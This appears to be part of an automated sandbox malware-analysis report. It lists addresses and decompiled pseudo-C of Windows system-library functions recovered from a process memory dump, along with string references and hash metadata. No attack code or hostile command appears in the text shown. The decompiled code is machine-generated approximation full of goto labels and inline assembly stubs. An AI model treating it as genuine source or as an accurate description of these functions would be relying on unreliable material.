                          0x04881be0
                          0x048d6ffc
                          0x048d7000
                          0x00000000
                          0x048d7006
                          0x048d7009
                          0x048d7009
                          0x04881be6
                          0x04881bec
                          0x04881c0b
                          0x04881c0b
                          0x04881c0c
                          0x04881c11
                          0x04881c12
                          0x04881c15
                          0x04881c1b
                          0x04881c1f
                          0x04881c31
                          0x04881c33
                          0x048d7026
                          0x048d7026
                          0x04881c21
                          0x04881c24
                          0x04881c24
                          0x04881bee
                          0x04881bee
                          0x04881bf2
                          0x04881c3a
                          0x04881bf4
                          0x04881bf4
                          0x04881c05
                          0x04881c05
                          0x04881c09
                          0x04881c3e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04881c09
                          0x04881bec
                          0x04881be0
                          0x04881bae
                          0x04881c2e

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: WindowsExcludedProcs
                          • API String ID: 0-3583428290
                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                          • Instruction ID: fe78ff88cce23c06a6ee83b1ac5ab5c00ae24fa35a339eac579f0e9bac8d625e
                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                          • Instruction Fuzzy Hash: EC212836601518AFDB22AE998844F5B77AEAF50B14F054E29FD04DB200EA30FC02A7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0489F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0489F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                          0x0489f71d
                          0x0489f722
                          0x0489f726
                          0x048e4770
                          0x0489f765
                          0x0489f769
                          0x0489f769
                          0x0489f732
                          0x048e477a
                          0x00000000
                          0x048e477a
                          0x0489f738
                          0x0489f73a
                          0x0489f73c
                          0x0489f73f
                          0x0489f746
                          0x0489f778
                          0x0489f7a9
                          0x0489f7a9
                          0x0489f754
                          0x0489f75a
                          0x0489f75d
                          0x0489f75f
                          0x0489f761
                          0x0489f76f
                          0x0489f771
                          0x0489f771
                          0x0489f76f
                          0x0489f763
                          0x00000000
                          0x0489f763
                          0x0489f77d
                          0x0489f7a3
                          0x0489f7a5
                          0x00000000
                          0x0489f7a5
                          0x0489f77f
                          0x0489f782
                          0x0489f784
                          0x0489f786
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0489f788
                          0x0489f748
                          0x0489f74d
                          0x0489f78d
                          0x0489f793
                          0x0489f7b7
                          0x0489f7bc
                          0x00000000
                          0x0489f7bc
                          0x0489f798
                          0x00000000
                          0x00000000
                          0x0489f79d
                          0x0489f7b0
                          0x00000000
                          0x0489f7b0
                          0x0489f79f
                          0x00000000
                          0x0489f74f
                          0x0489f74f
                          0x00000000
                          0x0489f74f

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: Actx
                          • API String ID: 0-89312691
                          • Opcode ID: bb97ef23b15d3527647c9e79e898a54adeef29b58cc26acf2cdfd4805afb218e
                          • Instruction ID: ad8a43bfd9477a432f74460f87114bf70e28aff1aafc55875f96b1bc1ff0257b
                          • Opcode Fuzzy Hash: bb97ef23b15d3527647c9e79e898a54adeef29b58cc26acf2cdfd4805afb218e
                          • Instruction Fuzzy Hash: 28117235304F86ABEF2C4D19849063572D5AB85728F2C4F2AE765CB391E760FC408341
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04928DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E04928DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4950d50);
				E048CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04905720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L048CDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L048CDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E048CD130(_t34, _t39, _t40);
			}





                          0x04928df1
                          0x04928df1
                          0x04928df1
                          0x04928df1
                          0x04928df1
                          0x04928df1
                          0x04928df3
                          0x04928df8
                          0x04928dfd
                          0x04928e00
                          0x04928e0e
                          0x04928e2a
                          0x04928e36
                          0x04928e38
                          0x04928e3c
                          0x04928e46
                          0x04928e46
                          0x04928e36
                          0x04928e50
                          0x04928e56
                          0x04928e59
                          0x04928e5c
                          0x04928e60
                          0x04928e67
                          0x04928e6d
                          0x04928e73
                          0x04928e74
                          0x04928eb1
                          0x04928ebd

                          Strings
                          • Critical error detected %lx, xrefs: 04928E21
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: Critical error detected %lx
                          • API String ID: 0-802127002
                          • Opcode ID: 52710ec984c89e107543c2acfb223d1dffca7f7d03bfccca08dd18be54399c1a
                          • Instruction ID: 01525f2fc2413d8bd2b46fe70b3bc1f421a1259f789afef65f0f6b5761ac67f8
                          • Opcode Fuzzy Hash: 52710ec984c89e107543c2acfb223d1dffca7f7d03bfccca08dd18be54399c1a
                          • Instruction Fuzzy Hash: FA118B71D04348DBEF24EFA886097DCBBF4BB04314F20462ED429AB282C3746606CF15
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0490FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule
                          Strings
                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0490FF60
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                          • API String ID: 0-1911121157
                          • Opcode ID: 2bc540dbe99615834b887167193f216330ba57313214e23775655d9ab94a4929
                          • Instruction ID: 4be16382faa4df12286f5e64f902e7c9343e524de4a27a6a78c0cd7803ca02ee
                          • Opcode Fuzzy Hash: 2bc540dbe99615834b887167193f216330ba57313214e23775655d9ab94a4929
                          • Instruction Fuzzy Hash: 0F110471550244EFEB22EF54C848F98BBB2FF04718F15C568E604972A0C7B9FA40CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04945BA5, Relevance: .6, Instructions: 592COMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E04945BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4951178);
				E048CD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04944C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E048BD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04945542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x49660e8;
								if( *0x49660e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x49660e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E048B9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E048B6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E048BF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E048BF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E048BF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E048BFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E048BFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E048BF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E048BF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04944CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E048CD130(_t427, _t494, _t511);
				}
			}










































































                          0x04945ba5
                          0x04945baa
                          0x04945baf
                          0x04945bb4
                          0x04945bb6
                          0x04945bbc
                          0x04945bbe
                          0x04945bc4
                          0x04945bcd
                          0x04945bd3
